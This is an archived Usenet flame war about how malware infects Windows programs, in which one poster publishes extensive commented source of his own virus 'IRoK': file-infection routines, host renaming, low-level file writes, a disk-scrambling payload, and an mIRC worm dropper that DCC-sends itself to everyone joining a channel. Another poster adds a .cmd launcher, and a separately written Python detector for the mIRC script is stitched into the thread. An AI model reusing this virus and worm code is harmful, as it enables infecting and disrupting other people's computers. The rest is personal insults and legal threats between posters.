How does a malware effect a program and get loaded by Windows?

 
 
Dustin
      27th Jul 2012
RayLopez99 <(E-Mail Removed)> wrote in
news:85b308d2-7bf9-4c65-8d9f-(E-Mail Removed):

> Again, the point of my exercise is to expose your ignorance to the
> world, not mine. Show us what you got. I never said 'fully
> functional'--I even said pseudocode is oK. Like the other poster
> said, do you even read your posts?


I provided functional source snippets. All were commented. I didn't
realize your programming skills are so bad that every single line would
require a comment to explain what it was doing.

You haven't exposed any ignorance on my end, Ray. I didn't have to
google "loader" and post the wrong one. I understand how to infect
executables, I've written many viruses that do just that. You can't even
grasp how it's done and you want to call me ignorant? Laughing Ray,
****ing laughing.

> LOL! You were fired by Malwarebytes. You were wanted like Mr. Smith
> by the law. You don't know how to use a modern language like C# by
> your own admission. You are respected? By who? By your mom maybe,
> if she even knows you. And non-programmers like the kiddie scripters
> you so despise. Dream on. You are nothing.


I wasn't fired, Ray. I was never "Wanted" by the law; they never talked
to me. I was unavailable. I actually stated I was well versed in many
languages, that includes the C# language; which, imo, is a disgrace to C.

Fact is, I provided you source code in an ancient language and you can't
make heads or tails of it. I'm not ignorant in this, you are. Woefully.

> I don't care "who you are"--I know that you are a loser. I want to
> show the board you cannot understand the code that you copy and
> paste. Prove me wrong, and I'll not post here again.


I didn't copy and paste any code. No viruses existed in Asic prior to
mine. There was NO CODE to copy and paste from.

You don't know a damn thing Ray. You've shown the board that you aren't
a coder, and.. in all reality, probably not a programmer either.

> Nope. At least shut up, and stop playing games.


I'm not playing any games with you Ray.

> You said that last time. Seems you get a kick out of these email
> fantasy games. Figures, since you can't code.


LOL!

> In your mind and in your dreams. Dream on, hobo.


hobo? You'll get far with that mindset.

> Projecting your own fears and fantasies....


Never heard of Steppenwolf, Ray?


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

 
Dustin
      27th Jul 2012
RayLopez99 <(E-Mail Removed)> wrote in
news:dad7d12b-b05c-472c-a9ba-(E-Mail Removed):

> On Friday, July 27, 2012 8:21:26 AM UTC-4, FromTheRafters wrote:
>
>> I really doubt that HT. Ray is going to have to do some 'self-study'
>> to even get to the point where any of it makes sense to him. Dustin
>> won't be wasting his time going over the basic background material
>> needed. I'm reasonably sure Ray isn't really grasping any of this yet.

>
> Yeah, spoken like the kiddie-script ass worshiper of Dustbin that you
> appear to be Rafters.


HAHAHA.. Right.. I was wondering when you'd fire on him.

> Why do you idolize this loser? He's not shown me anything he knows
> cannot be cut and paste out of a book on virus writing.


Find a book that has asic source code to a virus, that wasn't written by
me.



 
RayLopez99
      27th Jul 2012
On Friday, July 27, 2012 4:45:07 PM UTC-4, Dustin wrote:

>
> We're done then.
>
>


We may be done--you lost the challenge--but don't think for a moment you're out of the cross hairs of the law. The wheels of government grind slowly but they grind exceedingly fine. These organizations are looking for people like you to justify their tight budgets in these hard times. You are fodder for them to show their worth by taking you down. And you reopened the statute of limitations several times in this thread alone, not to mention your past boasts. Clearly you are a kiddie scripter with sycophant friends in this forum, but in the real world you are nothing, except food for computer crime law enforcement professionals, and they will eat you alive.

Pleasant dreams and keep that music pirating going...I'm sure that is more grist for their mill, in the civil lawsuits that will take away all the meager worldly possessions you have. Your 'good deeds' from working at Malwarebytes will get maybe a few months off your sentence in the sentencing phase of your trial.

Goodbye Dustbin. But I'll be watching you from time to time, just to add to my file.

RL
 
Dustin
      27th Jul 2012
"Hot-Text" <hot-(E-Mail Removed)> wrote in
news:juun1r$chc$(E-Mail Removed):

> "FromTheRafters" <(E-Mail Removed)> wrote in message
> news:juu3ua$7gg$(E-Mail Removed)...
>>
>> "Hot-Text" <hot-(E-Mail Removed)> wrote in message
>> news:juto7g$nvf$(E-Mail Removed)...
>>> Ray Lopez why do you want to create a virus
>>> to effect or infect a .exe file of Poor..
>>> For only the Poor will be hijack by the virus,
>>> I see you care not for the poor at all..
>>>
>>> *.CMD is a legitimate way to infected a Windows PC,
>>> not *.EXE.....

>>
>> What's the difference?
>>
>>

>
> *.CMD can get windows to do the work for you..
> Running *.exe and *.dll
>
> [Settings]
> REM ALT.COMP ant-virus.cmd 7-27-2011
> SET
> IF "%%"=="YES" SET=%%
> IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
> CALL %%\..\..\..\*.dll
> CALL %%\..\..\..\*.dll
>
> [Command 0]
> Command =
> OpenWndClass =
> OpenWndCaption =
> ;
> ;
> [Command 10]
> CheckFile =
> CheckIniSection =
> CheckIniEntry =
> CheckIniValue = %ARX_PARAM:1%
> OnSuccessGoto =
>
> [Command 20]
> Command =
> Caption =
> Size =
> Border =
> System Menu =
>
> [Command 30]
> Command =
> HtmlFile =
> WndSize =
> WaitSecs =
> OnFailureGoto =
>
>
> [Command 50]
> Command = run
> CheckReg =
> CheckRegKey =
> RunFile =
> OnSuccessGoto =
>
> [Command 70]
> Command = run
> RunFile =
> CmdLine = /oobe
>


Why would I bother doing all of that, when I can do this instead?

path_infect:
rem routine proceeds to infect selected path given via the 'n' variable
rem Notice, another safety check. This routine will abort if the
rem selected path does not exist.
call sub "path", n, virupath$
i=LEN(virupath$)
if i>0 then
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
rem Before we infect, trash checksum files

gosub waste:
gosub start_virus:
endif
return

hide_host:
rem host_hide module
oldname$=filename$
b=varptr(filename$)
c=len(filename$)
d=b+c
b=d-3
d=d-1
range=36
for x=b to d
gosub rand_num:
e=a
e=e+140
poke x,e
next x
rem Now the filename has been changed, Lets rename it real quick
gosub waste:
name oldname$ as filename$

write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return



 
Dustin
      27th Jul 2012
RayLopez99 <(E-Mail Removed)> wrote in
news:85b308d2-7bf9-4c65-8d9f-(E-Mail Removed):

> Again, the point of my exercise is to expose your ignorance to the
> world, not mine. Show us what you got. I never said 'fully
> functional'--I even said pseudocode is oK. Like the other poster
> said, do you even read your posts?


write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return

read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad!
rem cx register is how many bytes to read
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return

actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=0
attr=6
kewl=0
virii=7
CALL SUB "FindFirstF" proc$ Attr ErrCode
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
if sleepy=0 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
else
errcode=1
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND
return

rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then
rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif


if min$="17" then
rem We're fixing to hose this dudes drive. Well, not really.
rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any ****ing joint, any ****in Day."
print""
print"**** all these gun toting hip gangster wannabes. **** your"
print"tattoes, **** all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you. :-)"
gosub keypress:

if min$="21" then
print"ț IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif

rem End of payload jumpsystem!

mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.

tempfile$=filename$
filename$=script$
gosub set_attr:
filename$=tempfile$
rem drop script
open"o",2,script$
sensitivemsg=1
msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
gosub dump_msg:
msg$="n2= /dcc send $nick "
msg$=msg$+filename$
msg$=msg$+"|"
gosub dump_msg:
msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned by IRoK
v1.1|"
gosub dump_msg:
close 2
return

vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=1
endif
close 2
if vbsdrop=1 then
tempname$=filename$
filename$="c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=tempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=1 to 8095
print #2,x
next x
close 2
endif
return

whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return

raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=0
gosub set_attr:
gosub create_file:
tempsize=virus_size
tempsize=tempsize+1
bytesize=tempsize
dx=varptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return

rem ***--> End of Payload section.

Commented enough for you Ray?

That's not pseudocode either. That's verbatim irok source code.

> if she even knows you. And non-programmers like the kiddie scripters
> you so despise. Dream on. You are nothing.


Enjoy the code above. Tell us what each line does, if you can comprehend
what's being done. I wrote it. I know what it does. Let's see if you can
explain it to the group.

> I don't care "who you are"--I know that you are a loser. I want to
> show the board you cannot understand the code that you copy and
> paste. Prove me wrong, and I'll not post here again.


See above.

> You said that last time. Seems you get a kick out of these email
> fantasy games. Figures, since you can't code.


See above. All my code. All mine. Can you figure it out?

> In your mind and in your dreams. Dream on, hobo.


See the source code?


 
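The mirc_drop routine in the post above writes a script.ini whose JOIN handler DCC-sends the dropped file to anyone entering a channel, and adds a TEXT trigger that broadcasts with /amsg. As an added defender-side example (my code, not from the thread or the irok source), here is a Python check that parses a script.ini the way mIRC stores it (one script line per nN= entry under [script]), rebuilds the event handlers by brace depth, and flags exactly those two behaviours; both sample inputs are constructed to mirror what the dropper writes and are not captured from a real machine.

```python
import re

# Constructed sample inputs (not captured from a real system): the script.ini
# layout the dropper in the thread writes (mIRC stores one script line per
# "nN=" entry under [script]), and a harmless greeter script for comparison.
MALICIOUS_SCRIPT_INI = """[script]
n0=on 1:JOIN:#:{
n1=if ($nick != $me) {
n2= /dcc send $nick C:\\mirc\\irok.exe
n3= }
n4=}
n5=on 1:TEXT:irok:#:/amsg My computer is 0wned by IRoK v1.1
"""

BENIGN_SCRIPT_INI = """[script]
n0=on 1:JOIN:#:{
n1=if ($nick != $me) { /msg $nick Welcome to $chan }
n2=}
"""

# "on <level>:<EVENT>:..." introduces an mIRC event handler.
EVENT_RE = re.compile(r"^on\s+[^:\s]+:(\w+):", re.IGNORECASE)


def script_lines(ini_text):
    """Return the script body stored under [script], ordered by the N in nN=."""
    section = None
    numbered = {}
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "script":
            continue
        m = re.match(r"n(\d+)=(.*)$", line)
        if m:
            numbered[int(m.group(1))] = m.group(2)
    return [numbered[k] for k in sorted(numbered)]


def event_handlers(lines):
    """Split script lines into (EVENT, body_lines) pairs by tracking brace depth.
    A handler without an opening brace is a single-line handler."""
    handlers, current, depth = [], None, 0
    for line in lines:
        m = EVENT_RE.match(line)
        if current is None:
            if not m:
                continue  # stray line outside any handler
            current, depth = (m.group(1).upper(), []), 0
        current[1].append(line)
        depth += line.count("{") - line.count("}")
        if depth <= 0:
            handlers.append(current)
            current = None
    if current is not None:  # unterminated handler: report what we have
        handlers.append(current)
    return handlers


def scan_mirc_script(ini_text):
    """Flag the two behaviours the dropper installs: a JOIN handler that pushes
    a file to every joiner with 'dcc send', and a TEXT trigger that broadcasts
    with /amsg. Returns a list of human-readable findings (empty = clean)."""
    findings = []
    for event, body in event_handlers(script_lines(ini_text)):
        text = " ".join(body).lower()
        if event == "JOIN" and "dcc send" in text:
            findings.append("JOIN handler sends a file via DCC to every joiner")
        if event == "TEXT" and "/amsg" in text:
            findings.append("TEXT trigger broadcasts to all channels with /amsg")
    return findings
```

Run scan_mirc_script() over the script.ini in a user's mIRC directory; any non-empty result is worth a manual look, since legitimate scripts rarely DCC-send a file to every joiner.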
Dustin
      27th Jul 2012
RayLopez99 <(E-Mail Removed)> wrote in
news:0544112a-a39e-44f0-b2b9-(E-Mail Removed):

> On Friday, July 27, 2012 4:45:07 PM UTC-4, Dustin wrote:
>
>>
>> We're done then.
>>
>>

>
> We may be done--you lost the challenge--but don't think for a moment
> you're out of the cross hairs of the law. The wheels of government
> grind slowly but they grind exceedingly fine. These organizations
> are looking for people like you to justify their tight budgets in
> these hard times. You are fodder for them to show their worth by
> taking you down. And you reopened the statute of limitations several
> times in this thread alone, not to mention your past boasts. Clearly
> you are a kiddie scripter with sycophant friends in this forum, but
> in the real world you are nothing, except food for computer crime law
> enforcement professionals, and they will eat you alive.


Well, I've lost no challenge as I did present functional code snippets.
You demanded I share the more important ones with full commentation. Why
does it need full commentation I wonder? That's because YOU can't really
program.

I've provided more of the subroutines and various functions, I've even
included the worm drop section. Now, describe what each function is
doing, if you can.

> Goodbye Dustbin. But I'll be watching you from time to time, just to
> add to my file.


LOL. Ray, it's 2012; and you still can't code a functional virus. I did,
over 15 years ago. [g]



 
Dustin
      27th Jul 2012
RayLopez99 <(E-Mail Removed)> wrote in
news:c52cd645-77df-4121-b11c-(E-Mail Removed):

> I did understand, **** head, but I want you to walk us through it.
> Too difficult? I understand....go to bed now and be a good boy.


Not difficult for me. I want something from you tho. I don't work for
free. You understood it did you? Why did you request the other
subroutines with full commentation? Why are you still asking how a file
is infected? Some of that source code reverses the infection process on
the executable. If you did understand what I posted, You'd already know
how the process works and wouldn't have continued asking FTR those
newbie questions.

Fact is, you aren't a coder and you probably aren't a programmer.

> Who are these people, friends of yours? I don't give a **** if they
> are more incompetent than you. That's not the challenge.


I don't know them personally. I've never met any of them. I wouldn't say
we're friends, Ray.

> But they fired you?!


Nope. You guessed wrong again. Surprised, I'm not.

> You're just a punk that's got nothing. A Drama Queen. And from your
> prose you post like an old man, probably mid-60s or if younger you
> don't get out of the house much. Mother's basement?


Lots of theories you have bouncing around that empty space above your
nose...Must be a hell of an echo up there.



 
Hot-Text
      27th Jul 2012
"Dustin" <(E-Mail Removed)> wrote in message news:XnsA09DACFD9F82DHHI2948AJD832@no...
> "Hot-Text" <hot-(E-Mail Removed)> wrote in
> news:juun1r$chc$(E-Mail Removed):
>
>> "FromTheRafters" <(E-Mail Removed)> wrote in message
>> news:juu3ua$7gg$(E-Mail Removed)...
>>>
>>> "Hot-Text" <hot-(E-Mail Removed)> wrote in message
>>> news:juto7g$nvf$(E-Mail Removed)...
>>>> Ray Lopez why do you want to create a virus
>>>> to effect or infect a .exe file of Poor..
>>>> For only the Poor will be hijack by the virus,
>>>> I see you care not for the poor at all..
>>>>
>>>> *.CMD is a legitimate way to infected a Windows PC,
>>>> not *.EXE.....
>>>
>>> What's the difference?
>>>
>>>

>>
>> *.CMD can get windows to do the work for you..
>> Running *.exe and *.dll
>>
>> [Settings]
>> REM ALT.COMP ant-virus.cmd 7-27-2011
>> SET
>> IF "%%"=="YES" SET=%%
>> IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
>> CALL %%\..\..\..\*.dll
>> CALL %%\..\..\..\*.dll
>>
>> [Command 0]
>> Command =
>> OpenWndClass =
>> OpenWndCaption =
>> ;
>> ;
>> [Command 10]
>> CheckFile =
>> CheckIniSection =
>> CheckIniEntry =
>> CheckIniValue = %ARX_PARAM:1%
>> OnSuccessGoto =
>>
>> [Command 20]
>> Command =
>> Caption =
>> Size =
>> Border =
>> System Menu =
>>
>> [Command 30]
>> Command =
>> HtmlFile =
>> WndSize =
>> WaitSecs =
>> OnFailureGoto =
>>
>>
>> [Command 50]
>> Command = run
>> CheckReg =
>> CheckRegKey =
>> RunFile =
>> OnSuccessGoto =
>>
>> [Command 70]
>> Command = run
>> RunFile =
>> CmdLine = /oobe
>>

>
> Why would I bother doing all of that, when I can do this instead?
>
> path_infect:
> rem routine proceeds to infect selected path given via the 'n' variable
> rem Notice, another safety check. This routine will abort if the
> rem selected path does not exist.
> call sub "path", n, virupath$
> i=LEN(virupath$)
> if i>0 then
> b$=right$(virupath$,1)
> if b$<>"\" then
> virupath$=virupath$+"\"
> endif
> rem Before we infect, trash checksum files
>
> gosub waste:
> gosub start_virus:
> endif
> return
>
> hide_host:
> rem host_hide module
> oldname$=filename$
> b=varptr(filename$)
> c=len(filename$)
> d=b+c
> b=d-3
> d=d-1
> range=36
> for x=b to d
> gosub rand_num:
> e=a
> e=e+140
> poke x,e
> next x
> rem Now the filename has been changed, Lets rename it real quick
> gosub waste:
> name oldname$ as filename$
>
> write_file:
> rem this routine will write selected bytes at whatever current position
> rem from whatever buffer i choose into the file.
> rem if the routine did not write all data ax will not equal cx upon
> rem return from int call.
> rem define dx register before calling this routine to point to the
> rem memory address of the buffer area you want to write from. like so:
> rem dx=varptr(buffer(0))
> rem cx is how many bytes to write
> if file_handle>4 then
> ax=&hex4000
> bx=file_handle
> cx=bytesize
> int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
> byteswritten=ax
> endif
> return
>


Here's the start of an ax = ActiveX Control .dll for you;
yours will not run it......




--
This post contains IPA phonetic symbols in Unicode.
Without proper rendering support,
you may see question marks, boxes,
or other symbols instead of Unicode characters.


 
Hot-Text
      27th Jul 2012
"G. Morgan" <(E-Mail Removed)> wrote in message news:(E-Mail Removed)...
> Hot-Text wrote:
>
>>There a way around all antivirus/antimalware app,
>>For a Batch File CHM is best to update,
>>that antivirus/antimalware app of your..

>
> Huh?
>
> Are you talking about .chm files or .bat files?


*.chm was developed for HTML Help files, and
is able to run a
<script type="text/vbscript">
<!--

' -->
</script>
plus run Perl and PHP script files
from an Online Base Server....
 
Dustin
      28th Jul 2012
"Hot-Text" <hot-(E-Mail Removed)> wrote in
news:juv206$u96$(E-Mail Removed):

> "Dustin" <(E-Mail Removed)> wrote in message
> news:XnsA09DACFD9F82DHHI2948AJD832@no...
>> "Hot-Text" <hot-(E-Mail Removed)> wrote in
>> news:juun1r$chc$(E-Mail Removed):
>>
>>> "FromTheRafters" <(E-Mail Removed)> wrote in message
>>> news:juu3ua$7gg$(E-Mail Removed)...
>>>>
>>>> "Hot-Text" <hot-(E-Mail Removed)> wrote in message
>>>> news:juto7g$nvf$(E-Mail Removed)...
>>>>> Ray Lopez why do you want to create a virus
>>>>> to effect or infect a .exe file of Poor..
>>>>> For only the Poor will be hijack by the virus,
>>>>> I see you care not for the poor at all..
>>>>>
>>>>> *.CMD is a legitimate way to infected a Windows PC,
>>>>> not *.EXE.....
>>>>
>>>> What's the difference?
>>>>
>>>>
>>>
>>> *.CMD can get windows to do the work for you..
>>> Running *.exe and *.dll
>>>
>>> [Settings]
>>> REM ALT.COMP ant-virus.cmd 7-27-2011
>>> SET
>>> IF "%%"=="YES" SET=%%
>>> IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
>>> CALL %%\..\..\..\*.dll
>>> CALL %%\..\..\..\*.dll
>>>
>>> [Command 0]
>>> Command =
>>> OpenWndClass =
>>> OpenWndCaption =
>>> ;
>>> ;
>>> [Command 10]
>>> CheckFile =
>>> CheckIniSection =
>>> CheckIniEntry =
>>> CheckIniValue = %ARX_PARAM:1%
>>> OnSuccessGoto =
>>>
>>> [Command 20]
>>> Command =
>>> Caption =
>>> Size =
>>> Border =
>>> System Menu =
>>>
>>> [Command 30]
>>> Command =
>>> HtmlFile =
>>> WndSize =
>>> WaitSecs =
>>> OnFailureGoto =
>>>
>>>
>>> [Command 50]
>>> Command = run
>>> CheckReg =
>>> CheckRegKey =
>>> RunFile =
>>> OnSuccessGoto =
>>>
>>> [Command 70]
>>> Command = run
>>> RunFile =
>>> CmdLine = /oobe
>>>

>>
>> Why would I bother doing all of that, when I can do this instead?
>>
>> path_infect:
>> rem routine proceeds to infect selected path given via the 'n'
>> variable rem Notice, another safety check. This routine will abort
>> if the rem selected path does not exist.
>> call sub "path", n, virupath$
>> i=LEN(virupath$)
>> if i>0 then
>> b$=right$(virupath$,1)
>> if b$<>"\" then
>> virupath$=virupath$+"\"
>> endif
>> rem Before we infect, trash checksum files
>>
>> gosub waste:
>> gosub start_virus:
>> endif
>> return
>>
>> hide_host:
>> rem host_hide module
>> oldname$=filename$
>> b=varptr(filename$)
>> c=len(filename$)
>> d=b+c
>> b=d-3
>> d=d-1
>> range=36
>> for x=b to d
>> gosub rand_num:
>> e=a
>> e=e+140
>> poke x,e
>> next x
>> rem Now the filename has been changed, Lets rename it real quick
>> gosub waste:
>> name oldname$ as filename$
>>
>> write_file:
>> rem this routine will write selected bytes at whatever current
>> position rem from whatever buffer i choose into the file.
>> rem if the routine did not write all data ax will not equal cx upon
>> rem return from int call.
>> rem define dx register before calling this routine to point to the
>> rem memory address of the buffer area you want to write from. like
>> so: rem dx=varptr(buffer(0))
>> rem cx is how many bytes to write
>> if file_handle>4 then
>> ax=&hex4000
>> bx=file_handle
>> cx=bytesize
>> int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
>> byteswritten=ax
>> endif
>> return
>>

>
> here a start of ax = ActiveX Control.dll for you,
> yours will not run it......


It's a .dll. You can still call specific functions via the runtime32.
[g]

Binary files don't go so well across usenet you know.



 